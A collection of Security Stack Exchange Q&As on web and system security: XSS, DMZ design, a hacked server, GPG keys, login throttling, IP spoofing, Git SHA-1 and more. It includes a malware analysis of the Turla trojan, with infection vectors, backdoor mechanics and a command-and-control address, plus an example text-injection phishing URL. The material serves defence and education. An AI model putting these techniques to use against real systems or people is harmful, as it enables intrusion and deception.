JavaScript from accessing the DOM of another site. Since JavaScript cannot access the DOM of another site, it cannot leak material from the other site. So, if your question boils down to whether a script running in one tab, or even an iframe, can capture the banking password from elsewhere in the browser, then no, provided same-origin is properly implemented in the browser itself. Same origin applies to domain from which the page was served, not from which the script was served. So, my page at hxxp://bbrown.spsu.edu/ (it wasn't interesting, and now it's dead because I've retired) can load a script from google-analytics.com, as it does, and that script has access to the DOM of the page from which it was loaded; it can also send stuff back to Google through a bit of sleight-of-hand. The point is, it can do that only because I trusted Google Analytics enough to load their script in my page; the code that loads the page is in markup I wrote. If you load my page into your browser, that script from google-analytics.com can see only the DOM of my page in your browser, and not anything else you may have open in your browser. | {
"source": [
"https://security.stackexchange.com/questions/73661",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61430/"
]
} |
73,689 | My colleagues claim that XSS is a vulnerability on the server side. I always thought that this is a client side vulnerability. Which one of us is correct, and why? | In a cross-site scripting attack, the malicious script is run on the client, but the actual flaw is in the application. That doesn't necessarily mean that it is a strictly server-side vulnerability, in that the flaw could be in the application's JavaScript, but generally, it is indeed in server-side code, and always in code that is delivered by the server. There are client-side mitigations, such as the XSS-Protection that is now built into major browsers, or plugins that prevent the execution of JavaScript, but ultimately XSS is a web application vulnerability, and needs to be fixed by the application developers. I should mention that there is another form of XSS that exploits neither flaws in the client (the browser) nor flaws in the server (the application) but flaws in the user. This is often called Self-XSS, and exploits the willingness of a inept user to execute JavaScript he has copied and pasted from the Internet and into his browser's developer tools console, solely on base on the promise that against all hope, it will magically allow him to read his ex-girlfriend's Facebook posts despite the fact she has unfriended and blocked him. | {
"source": [
"https://security.stackexchange.com/questions/73689",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61461/"
]
} |
73,779 | Our security experts, database administrators, network team and infrastructure team are all saying it's OK to have the database server located in the DMZ along with the HTTP server and middle-ware server. Their reason: If the database server is compromised (because of an insecure middle
tier), at least the database server is outside the internal system. If it is
inside our network, the hacker can then use the database server to access
other systems. What they are saying is: Let's not put the middle-ware server behind a second firewall and the database
server behind a third firewall. Let's use just one firewall (the HTTP server's) in case a hacker wants
to get our database's sensitive data, at least that's all they can get. The second statement was actually said... verbatim. Please note that this database server will hold sensitive information, including bank details. Now, are these experts making any sense to you?
I'm a software developer, and I can't get their logic. It's like, "Put the jewelry box outside the house so that robbers won't bother getting in for the TV?" | SANS' "Making Your Network Safe for Databases" ( http://www.sans.org/reading-room/whitepapers/application/making-network-safe-databases-24 ) reads a little dated in some sections, but provides a decent "for dummies" level of guidance in the direction you're after. You could also exhaust yourself poking through the US NIST's resource centre ( http://csrc.nist.gov/ ). I think ISO's ISO/IEC 27033-2:2012 would be on topic too, but don't have a copy at hand to be sure. You're trying to separate/isolate the most sensitive servers (the database servers) from the most exposed (and therefore vulnerable). You're proposing a "defense in depth" approach, that seeks to
a) prevent attacks where possible, and
b) delay their progress (and access to the important stuff) when not. Ideally, everything is always hardened and patched, servers only listen for traffic on required ports, and only from allowed devices, all traffic "in flight" is inaccessible to unauthorized listeners (through encryption and/or isolation), and everything is monitored for intrusion and integrity. If all that is in place with 100% certainty, then great, your "opposition" have addressed point a) above, as much as is possible . Great start, but what about point b)? If a web server does get compromised, your proposed architecture is in a much better spot. Their potential attack footprint, and vector, is much larger than it needs to be. The justification for separate database from web servers is no different than the justification they've accepted for separating web servers from LAN. More bluntly: if they're so convinced a compromised web server presents no danger to other systems in the same security zone, why do they think a DMZ is required at all? It's awfully frustrating to be in your situation. At the very least, in your position I'd create a risk memo outlining your concerns and suggestions, and ensure they acknowledge it. CYA, anyway. | {
"source": [
"https://security.stackexchange.com/questions/73779",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61522/"
]
} |
73,862 | An Ubuntu server of my company has been hacked to carry out a DoS attack. I found the shellshock bug had not been fixed by my colleagues, and I think it's the problem.
Then, I found an ELF file that sends thousands messages, and the script is auto-generated by something. Even if I try to remove it, it creates newly by itself by using a new name (in /boot, /etc/init.d).
Besides, I see the netstat command doesn't show me all real open ports. Maybe has the command been replaced? How is it possible to re-install it? | You should "nuke it from orbit": wipe and reinstall the OS and applications from clean source media, and then carefully restore the data from backup. | {
"source": [
"https://security.stackexchange.com/questions/73862",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61579/"
]
} |
73,917 | I am developing a web page where people can write and comment things (no personal informations required) and I need to put a log in form so users can see all their actions on my web page. My idea is to program a log in form without SSL and also allow people to log in with Facebook if they prefer. The page will load completely only if JavaScript is enabled. My first problem is making sure that nobody can steal the user credential by acting like a man in the middle. I thought of solving it with a first hashing on client side with JavaScript and then on the server side, if I receive hashed values(in case someone deletes some JavaScript), a second hashing and store those hashed values in the user database. Is it a safe way to implement it? Also, are there any chances that some data get lost? If so how can I know if the received data is not compromised? Protect from dictionary and brute force attacks. I would solve it by counting the number of failed log in attempts associated to that user account and if it is more than 8-10 in row show a CAPTCHA at each of the next log in and also implement a time delay between successive log in attempts. I think in this way IP changes are not going to be a problem because I am counting the number of failed log ins on the server side (I would set a user variable in PHP). The Log In form. I implemented it in this way (without the hashing for now): <input id="username" name="userName" placeholder="Username" type="text">
<input id="password" name="pass" placeholder="Password" type="password"> But when the form is sent on the URL I can read the password like: /LogIn.php?userName=user&pass=pass How can I hide the password? What could be other good advices, to achieve as much security as I can without using SSL? | Why are you refusing to use TLS? It works, it has a good track record (some minor exceptions aside). Refusing to use good tools without a compelling reason does not engender confidence and does not immediately suggest professionalism. Additionally, do not roll your own authentication system. That is silly, and you will make mistakes. Instead, since you expect your users to have a facebook account, use OAuth2 to consume federated identity and authentication. Even better, outsource this to a federation service who has mastered it and even provides code-snippets ( https://oauth.io/ comes to mind). Don't make your life difficult. | {
"source": [
"https://security.stackexchange.com/questions/73917",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55406/"
]
} |
73,963 | I'm planning to purchase a SSL certificate for one of my sites when I'm concerned about points made in these articles: WiredTree: The Most Significant Issue With SSL – And How To Solve It TechRepublic: POODLE vulnerability hastens the death of SSL 3.0 Infosec Island:
IPv6 - The Death of SSL This POODLE Bites: Exploiting The SSL 3.0 Fallback Is SSL secure any more? What are they talking about? I thought SSL was bullet-proof, but now I'm confused. If SSL is not secure any more, with regard to safeguarding the information exchanged between my clients and my server via HTTP, what are my options other than a SSL certificate? | All except the third link refer to SSLv3 (version 3) which is affected by the poodle vulnerability. You should be using the TLS protocol which is the successor of SSL and not affected. You should configure your web server to support TLS 1.0, 1.1 and 1.2, which should cover most devices out there save for a few archaic ones like IE6.0, while still remaining secure. The certificate used for both protocols is the same. Most mass media websites refer to TLS/SSL as simply SSL. They are actually two separate protocols. More information here : What's the difference between SSL, TLS, and HTTPS? As for the 3rd link, it refers to IPv6 superceding SSL. My opinion is that it will take at least a few more years for IPv6 to become the de-facto addressing scheme. In the mean time, an SSL certificate will secure your site. Afterall, you can buy a cert for 1-2 year duration if you are afraid it will become obsolete in the near future. | {
"source": [
"https://security.stackexchange.com/questions/73963",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37952/"
]
} |
74,067 | I'm trying to export the public component of my subkey, but all GPG will give me is the public component of my master key. The keyring is set up like this . $ gpg -K
/home/alex/.gnupg/secring.gpg
-------------------------------------------------------
sec# 4096R/4ACA8B96 2014-06-21 [expires: 2015-06-21]
uid Alex Jordan <[email protected]>
ssb 4096R/633DBBC0 2014-06-21
ssb 4096R/93A31C56 2014-06-21
$ gpg --armor --export 93A31C56
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (MingW32)
...
-----END PGP PUBLIC KEY BLOCK----- The key that is output to the console is the public component of 4ACA8B96, not the requested key. Is there a technical limitation that's preventing this from working, or is it just GPG being stubborn? | RFC 4880, OpenPGP, 11.1. Transferable Public Keys defines subkey packets are always preceded by a public (primary) key, thus GnuPG does not allow to export it separately. To do so anyway, export the key (it is recommended to use --export-options export-minimal to reduce the number of packets you have to deal with), and use gpgsplit on it, which will decompose the OpenPGP file into the individual packets. Those ending in public_subkey are the ones you're looking for. To find out which one is the right, have a look into them using pgpdump [file] ( gpg --list-packets fails for single packets, as the input is no valid OpenPGP file). pgpdump should be available for most distributions in a package of the same name. | {
"source": [
"https://security.stackexchange.com/questions/74067",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9571/"
]
} |
74,120 | I don't share any personal information with StackExchange, I'm not really worried about anyone trying to hack my account and I can't see any incentive for them to do so, and yet the password strength requirements are about the strongest I've ever seen. Why does this site, and others, insist on strong passwords? What's the reasoning behind it? I can understand why my bank might insist on high security, but isn't it up to me how secure I want to be on here? | Do you remember earlier this year when Apple's cloud was hacked? Well, Apple's cloud wasn't hacked . Some celebrities with really weak passwords had their passwords guessed. But the headlines will still read that Apple's cloud got hacked. And that is why you don't allow users to use really weak passwords. | {
"source": [
"https://security.stackexchange.com/questions/74120",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61815/"
]
} |
74,211 | I am currently working on the redesign of a login page. I have initially suggested that login be throttled whereby pauses (incremental - in number of seconds) are introduced between each failed login attempt. The idea is that this will allow us to avoid locking the account and give users time to think about reseting their password and also counter any brute force attacks. The development team suggested that login throttling will not help in preventing brute force attacks but a temporary lockout will. The temporary lockout works in the same way except that pauses introduced are (incremental - in number of mins and hours) so I am a bit confused...below is an example of how IBM QuickFile allows login to be configured: So I have a number of questions: Is a temporary lockout just another term for login throttling? What is the difference between login throttling and temporary lockout ? Are they the same but use different configuration parameters. for example 3-6-12 seconds vs 5 -10 - 20 mins ? What are the interaction design implications that I need to consider when adopting a temporary lockout mechanism? Can I let the user know when they will be able to try again? Perhaps using some form of visual indicator? What are the most adapted time-frames for pauses between failed login attempts that will not frustrate the end user? This post on stakoverflow seems to suggest seconds rather than mins What impact does this have on Denial of Service ? Update: Clarifications A bit more to clarify! when a Login fails the "try again" button is disabled a for a duration of 3 sec after which it is enabled.The user attempts to login again and fails, the "try again" button becomes inactive for 6 sec. The process is repeated for 5 consecutive attempts and error messages direct users to reset their password.At the 5th attempt users are presented with a password reset screen. On the other hand users could attempt to login and have a specified number of attempts after which the account is "locked" for a period of time, say 5 mins this increases to 10 mins after another set of attempts. Thanks | A) Yep you got it. Same in that they both result from a failed login attempt(s), though they differ in things like logging, the resulting UX implementation, and when one is used. If a user is temporarily locked out, this is email-worthy. You should send an email or text-message to them notifying them that enough failed attempts were made to warrant a temporary lockout. This is an opportunity to empower the user to intervene in the event that it isn't them attempting to log in. Alternatively you could use just a lockout timer in minutes, but requiring action from the user to unlock the account would be more ideal. Throttling is more for pacing. "hold your horses, take a breath" and can be done without even informing the user. A simple UI spinner element can be used to prevent the user from accidental double-form-submits and prevent rapid attempts over the span of seconds as opposed to minutes or hours. This can also be used as an opportunity to detect bruteforce attempts if the attacker isn't going through your UI. If 3 attempts are made per second but your UI only allows 1 attempt every 3 seconds, something is amiss. | {
"source": [
"https://security.stackexchange.com/questions/74211",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61875/"
]
} |
74,280 | Is it good secure programming practice to overwrite sensitive data stored in a variable before it is deleted (or goes out of scope)? My thought is that it would prevent a hacker from being able to read any latent data in RAM due to data-remanence. Would there be any added security in overwriting it several times? Here is a small example of what I am talking about, in C++ (with comments included). void doSecret()
{
// The secret you want to protect (probably best not to have it hardcoded like this)
int mySecret = 12345;
// Do whatever you do with the number
...
// **Clear out the memory of mySecret by writing over it**
mySecret = 111111;
mySecret = 0;
// Maybe repeat a few times in a loop
} One thought is, if this does actually add security, it would be nice if the compiler automatically added the instructions to do this (perhaps by default, or perhaps by telling the compiler to do it when deleting variables). This question was featured as an Information Security Question of the Week . Read the Dec 12 2014 blog entry for more details or submit your own Question of the Week . | Yes that is a good idea to overwrite then delete/release the value. Do not assume that all you have to do is "overwrite the data" or let it fall out of scope for the GC to handle, because each language interacts with the hardware differently. When securing a variable you might need to think about: encryption (in case of memory dumps or page caching) pinning in memory ability to mark as read-only (to prevent any further modifications) safe construction by NOT allowing a constant string to be passed in optimizing compilers (see note in linked article re: ZeroMemory macro) The actual implementation of "erasing" depends on the language and platform. Research the language you're using and see if it's possible to code securely. Why is this a good idea? Crashdumps, and anything that contains the heap could contain your sensitive data. Consider using the following when securing your in-memory data SecureZeroMemory .NET SecureString C++ Template Please refer to StackOverflow for per-language implementation guides. You should be aware that even when using vendor guidance (MSFT in this case) it is still possible to dump the contents of SecureString , and may have specific usage guidelines for high security scenarios. | {
"source": [
"https://security.stackexchange.com/questions/74280",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47692/"
]
} |
74,345 | Is it possible to provide a subjectAltName-Extension to the openssl req module directly on the command line? I know it's possible via a openssl.cnf file, but that's not really elegant for batch-creation of CSRs. | As of OpenSSL 1.1.1, providing subjectAltName directly on command line becomes much easier, with the introduction of the -addext flag to openssl req (via this commit ). The commit adds an example to the openssl req man page : Example of giving the most common attributes (subject and extensions)
on the command line:
openssl req -new -subj "/C=GB/CN=foo" \
-addext "subjectAltName = DNS:foo.co.uk" \
-addext "certificatePolicies = 1.2.3.4" \
-newkey rsa:2048 -keyout key.pem -out req.pem This has been merged into the master branch of the openssl command on Github , and as of April 18 2018 can be installed via a git pull + compile (or via Homebrew if on OS X: brew install --devel [email protected] ). Note that if you have set the config attribute "req_extensions" at section "[req]" in openssl.cfg, it will ignore the command-line parameter | {
"source": [
"https://security.stackexchange.com/questions/74345",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47847/"
]
} |
74,346 | For homework, I coded a TCP packet with raw sockets . So I was also able to change the source IP address to whatever I wanted. So why can't someone just make a program, which sends millions of these packets ( DDoS ) with a different source IP address? Wouldn't he/she be "secure" and no one could trace him/her? Further questions: Couldn't you just implement this in this DDoS program called LOIC ? So there wouldn't be anyone busted using it. What do the routers log about me (sender)? Could the police trace me with these logs? | You are correct that this is possible. There are problems with the plan though: The network you are leaving can filter to drop outgoing packets that do not have a source IP from within their network. DDoS ( Distributed Denial of Service) is based around idea that many boxes target a single one, overloading the target's ability to handle the data. Your single consumer hardware is unable to produce the output alone to overload a target. Source IP address spoofing is used in some denial of service attacks, such as sending small requests for large amounts of data to many servers where the servers will reply to the spoofed target. See Reflected/spoofed attack on Wikipedia or last year's NTP Amplification Attack from the US CERT. Usually TCP doesn't benefit from address spoofing due to the three-way handshake . It is more useful with TCP to perform session hijacking . | {
"source": [
"https://security.stackexchange.com/questions/74346",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61974/"
]
} |
74,524 | For the last 2 days, +/- every 15 minutes, someone is attempting to sign-in to my online email account. When I verify recent activity, the IP address (and the corresponding country) is different for each attempt. I assume it is the same person (bot) attempting to log in from the same geographical location. How does the hacker manage to fake a different IP address? (Is he using an anonymity software like TOR?) | TOR, VPN, bots, proxies, you name it.. The source IP is not "spoofed" per se... it's the real deal. If someone really spoofed a source IP, they couldn't establish a TCP connection or receive any replies. The source IP spoofing method is more useful over UDP when launching an amplification attack to a victim/spoofed IP. | {
"source": [
"https://security.stackexchange.com/questions/74524",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62122/"
]
} |
74,608 | spammimic.com offers a service that 'encrypts' your mail as 'spam', the rationale being that all mail services automatically filter out spam, and so if you're wanting to communicate with someone without an eavesdropper noticing, disguising your message as spam will do this. Is there any evidence that this would actually work though? In order for your message to get through, it would have to be sufficiently not like spam in order not to be deleted outright. Assuming you send it from your own account, headers etc. will be intact, and isn't this the first thing that spam filters check? Wouldn't it be the first thing the eavesdropper would check too? In short: Dear Friend , Especially for you - this red-hot announcement ! If you no longer wish to receive our publications simply reply with a Subject: of "REMOVE" and you will immediately be removed from our club . This mail is being sent in compliance with Senate bill 1621 ; Title 1 ; Section 309 . This is NOT unsolicited bulk mail . Why work for somebody else when you can become rich within 61 DAYS ! Have you ever noticed nobody is getting any younger and people are much more likely to BUY with a credit card than cash . Well, now is your chance to capitalize on this ! We will help you SELL MORE & use credit cards on your website . You are guaranteed to succeed because we take all the risk . But don't believe us ! Mrs Ames who resides in Delaware tried us and says "I've been poor and I've been rich - rich is better" ! We are licensed to operate in all states ! Do not go to sleep without ordering . Sign up a friend and your friend will be rich too ! Cheers . Dear Friend ; Especially for you - this cutting-edge intelligence ! This is a one time mailing there is no need to request removal if you won't want any more ! This mail is being sent in compliance with Senate bill 2416 , Title 3 ; Section 302 ! This is not a get rich scheme ! Why work for somebody else when you can become rich within 71 weeks ! Have you ever noticed society seems to be moving faster and faster and most everyone has a cellphone ! Well, now is your chance to capitalize on this ! We will help you SELL MORE and increase customer response by 170% ! You are guaranteed to succeed because we take all the risk . But don't believe us . Mr Jones of Georgia tried us and says "Now I'm rich many more things are possible" ! This offer is 100% legal ! So make yourself rich now by ordering immediately ! Sign up a friend and you'll get a discount of 60% . Best regards ! | It would help if you elaborated on if you are defending from a targeted attack or just being cautious, and what vector the potential adversary would be using to eavesdrop. That being said, the method you are referring to is called ' security through obscurity ', and is "… discouraged and not recommended by standards bodies." I would say that is putting it nicely. Security though obscurity is very BAD (on it's own). Try watching this video from Def Con 21 , told from the perspective of forensic investigators. They show several examples of why security through obscurity is a bad idea. You can also get an understanding of the capabilities of the tools used by forensic investigators. | {
"source": [
"https://security.stackexchange.com/questions/74608",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1953/"
]
} |
74,623 | Is renaming folders & files and changing file types an effective solution for file security of a PC? I am an application programmer and have an extensive background in it. I have written a robust program that renames folders and files and also changes file types. It does not compromise the integrity of the file, although I have been able to do that as well and change it back. I am just wondering, how secure this is. I know that if for example I change: test.jpeg to test.txt , if someone were to simply change it back, my security is compromised. I've obviously made it more complex than this, but is there a loophole? Is there a way to check PC logs for file changes or some other way a pro would decipher this. As I said, my program that ' encrypts ' these files is very robust, I highly doubt anyone but myself would be able to understand / compromise it. Some of the security vulnerabilities I do know about: A user could simply rename all of the files and thus have beaten the
security To solve this I would add a header line to files so that even if the file was renamed it could no be read by the program. For images a user could check the system thumbnails To counter this I clear all temporary files upon encrypting files. PC backups that contain the non- encrypted file Know and control your backups. Any other ways to crack this security? A further note to this, this security solution was thought of after having CryptoVirus attack my server. Awfully impossible to reverse the changes that that virus made. I thought why not apply the same methodology to my file security. Another note is that I am building upon Windows 7, with thoughts to expanding to other Windows platforms. | What you are doing is no kind of encryption, it is just obfuscation. It relies on security by obscurity . It may be enough to hide your files from an amateur/casual observer, but anyone analyzing the files in a hex editor is going to be able to rebuild and access them. Effectively your method is about equal in complexity to attempting file undeletion, for which there are a host of tools available to anyone versed in digital forensics. By contrast, the CryptoLocker malware you mentioned uses valid public-key cryptography , which is probably a method you should consider. | {
"source": [
"https://security.stackexchange.com/questions/74623",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62195/"
]
} |
74,695 | There are several articles describing the newly discovered Linux-based Turla trojan. But basically, all these articles repeat the same, very limited, information.
Can anybody provide more details, such as: How do linux machines get infected Is there any privilege escalation involved, or is the whole thing only happening under the infected user (i.e. uid 1000) Where does the malware code "live" on the infected machine plus any other interesting details | TURLA is the final stage of a large and sophisticated family of malware. There have been known Windows versions since at least 2010. This 40 page presentation is the most comprehensive resource I have seen, for either platform. TURLA - development & operations Some Windows Highlights Stage 0: attack stage - infection vector Stage 1: reconnaissance stage - initial backdoor Stage 2: lateral movements Stage 3: access established stage - TURLA deployed On each stage they can quit if they lose interest in target Stage 0: Injection Vectors Spear Phishing ( CVE-2013-3346 )( CVE-2013-5065 ) Watering Holes [Adobe Update social engineering / Java exploits ( CVE-2012-1723 ), Adobe Flash exploits or Internet Explorer 6,7,8 exploits] Third party supplier compromise Stage 1: Reconaissance Stage Initial backdoor - WipBot/Epic/TavDig WipBot is a combination of a zero-day and a CVE-2013-3346 exploit Exports functions with same names as TURLA. No other similarities Breaks debugging and most malware sandboxes Process hops several times, wipes its own PE section Further described in Kaspersky Lab report Stage 2: Lateral Movements Refine C&C Further penetrate network Utilize new backdoor Gets Domain Admin credentials Stage 3: Turla Dropped on select machines for long-term compromise Machines can be compromised for years without detection Other Resources The 'Penguin Turla' - Kaspersky Lab (linux specific details) Symantec Report - Turla Linux Highlights Turla module written in C/C++ Based on cd00r Executable is statically linked against multiple libraries Its functionality includes hidden network communications, arbitrary remote command execution, and remote management Much of its code is based on public sources Cannot be detected with netstat Does not require root access Linux Executable Characteristics ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped Linux Statically Linked Libraries glibc2.3.2 - the GNU C library openssl v0.9.6 - an older OpenSSL library libpcap - tcpdump's network capture library Linux C&C Details First stage C&C is hardcoded. Known activity @ news-bbc.podzone[.]org pDNS IP: 80.248.65.183 Linux Startup/Execution Details Process requires two parameters: ID (a numeric value used as a part of the "magic packet for authentication") and an existing network interface name The parameters can be inputted two different ways: from STDIN, or from dropper a launching the sample After the ID and interface name are entered and the process launched, the backdoor's process PID is returned Linux Magic Packet Statically links PCAP libraries Gets raw socket, applies filter, captures packets Checks for an ACK number in the TCP header, or the second byte from the UDP packet body If condition is met, execution jumps to packet payload contents and creates regular socket Backdoor uses new socket to connect to source address of Magic Packets Backdoor reports its own PID and IP, waits to receive commands Arriving commands are executed with a "/bin/sh -c " script Final Notes Everything regarding the linux version was from the Kaspersky report. Unfortunately, detecting seems to be very difficult at this point. "Although Linux variants from the Turla framework were known to exist, we haven't seen any in the wild yet." - Kaspersky Lab | {
"source": [
"https://security.stackexchange.com/questions/74695",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28654/"
]
} |
74,728 | I've been learning about PGP, and I asked myself, "Why?" For example, if I'm using https://mail.google.com , then what benefit would adding PGP offer that would justify it being used? I can understand that its possible for an encryption method to become compromised, and it could be seen as a means to avoid disaster if a backdoor to SSL/TLS was released. PGP is also more decentralized, which could be attractive to some. | SSL/TLS protects the email from tampering or eavesdropping as it transits between your computer and Google's server, and possibly during further relays to eventual recipient. And that's all it does. PGP does far more. If you're sending a signed email, the recipient can verify that the email was sent by you, and that it was not tampered with at any point between when you wrote it and when they received it. If you're sending an encrypted email, you know that nobody but the intended recipient can read it -- not Google, not the NSA, nobody. That's why it's called " End to End Encryption ". However, the email metadata (from, to, subject, timstamps) is still sent in clear, and PGP can't help with that. So in general, it's best to send PGP-encrypted emails via TLS-secured connections. | {
"source": [
"https://security.stackexchange.com/questions/74728",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62291/"
]
} |
75,817 | A strong cryptographic hash makes collisions unlikely. Many cryptographic protocols build on that fact. But Git is using SHA-1 hashes as object identifiers. So there are a lot of already computed hashes out there in the public Git repositories of the web, along with details on how to reproduce them. Is there some known attack on some protocol where this might be leveraged? Something like “well, I can do something evil if I replace this unknown plain text with some other plain text with the same SHA-1 hash, so instead of computing a collision I'll google for it.” Of course, the space of all hashes is still far from covered by Git commits, but nevertheless, I'd guess all the Git commits out there might amount to quite some CPU hours of computing SHA-1 hashes. I'm not sure whether that guess is justified, though. As far as I can see, such an attack would only work if the hash is visible, the plain text from which it was generated is not, but some cypher text generated from is, and a different text can be encrypted as well. So this looks like it might apply to some public key based protocols, where you can encrypt but not decrypt. Furthermore, you don't have control over the colliding plain text, so obvious things like putting your own name as the beneficiary of some financial transaction won't work. Are there any scenarios where such a crowd-sourced hash collision could cause serious trouble with non-negligible probability? | Is Git crowdsourcing the production of SHA-1 preimages ? Not to any meaningful degree. Github doesn't say how many commits it's tracking, but it's probably not more than a few billion. For comparison, there are 1,461,501,637,330,902,918,203,684,832,716,283,019,655,932,542,976 possible SHA-1 hashes, so the odds of finding a plaintext matching an arbitrary hash of interest are effectively non-existent. | {
"source": [
"https://security.stackexchange.com/questions/75817",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37740/"
]
} |
75,958 | Someone reported a bug on my site that I don't really consider an issue. My site has an URL akin to this: www.site.com/ajax/ads.asp?callback=[text injection] So filetype is application/json, and I don't see how that can affect security of site. His point of contention was that it can bypass crossdomain.xml if someone visits page with this in it: <script src=www.site.com/ajax/ads.asp?callback=[some javascript]></script> I did a search for this but couldn't really find any information that says what he is saying is true. I need someone to tell me how serious this is, if I really need to go through my scripts to fix every instance of this bug. | Plaintext injection is an issue. Say you have a page template that looks like this: Hi <name>,
Blah blah blah. And you can inject from the URL. An attacker can construct an email with a link to www.example.com/ajax/ads.asp?name=Foo%2C+you+have+the+wrong+version+Flash+plugin%2C+our+company+policy+requires+that+you+use+version+vul.ne.rabl.e.%0D%0A%0D%0AHi%020Foo (which could also be minified). This will make your page look like: Hi Foo, you have the wrong version Flash plugin, our company policy requires that you use version vul.ne.rabl.e. Hi Foo, Blah blah blah. The message looks like it comes from your site, and since your users trusts your site, they will likely believe the instructions that "you" have given. | {
"source": [
"https://security.stackexchange.com/questions/75958",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10608/"
]
} |
75,981 | I was using my laptop at a Starbucks on a table, and a person was using a laptop on the same table across from me, a couple seats to my side. He flicked some plastic thing across the table towards my laptop. What really freaked me out was he then actually flicked it again further to get it right in front of my laptop, behind my screen. The plastic thing was ring-shaped with a metal part on one end, which looked like the 30-pin iPhone charger. I've attached the basic shape. Does anyone think they might know what the plastic dongle could be and/or have any information that would suggest the person was trying to do something malicious? | No, you are just being paranoid. You were probably already connected to him over WiFi. There are many attacks he could have run this way without additional devices. Also if he would have wanted to hack you, he would not have thrown his strange hacking device in your face. He would have hidden it below the table. Side note: I feel like most of the people saying they have been hacked are only paranoid. While most of the people who actually have been hacked do not notice it at all. Also see VolleyJosh answer about the device. | {
"source": [
"https://security.stackexchange.com/questions/75981",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/63504/"
]
} |
76,189 | I am cleaning up the certificate stores on my Windows machines, and considering which certificates I should keep, and which ones I should delete. Why does a fresh install of Windows Server 2012 R2 come with certificates such as these: Considering that these certificates expired back when I was in high school, what could they possibly be good for? Why would they still be included with the operating system 15 years later? | In essence, these certificates are necessary and required for backward compatibility with XP and Server 2003. If anything was signed with these certificates, even if they're expired now , your server needs the cert trusted in order to trust the thing that the cert signed. Source: http://support.microsoft.com/kb/293781 Some certificates that are listed in the previous tables have expired. However, these certificates are necessary for backward compatibility. Even if there is an expired trusted root certificate, anything that was signed by using that certificate before the expiration date requires that the trusted root certificate be validated. As long as expired certificates are not revoked, they can be used to validate anything that was signed before their expiration. | {
"source": [
"https://security.stackexchange.com/questions/76189",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/15499/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.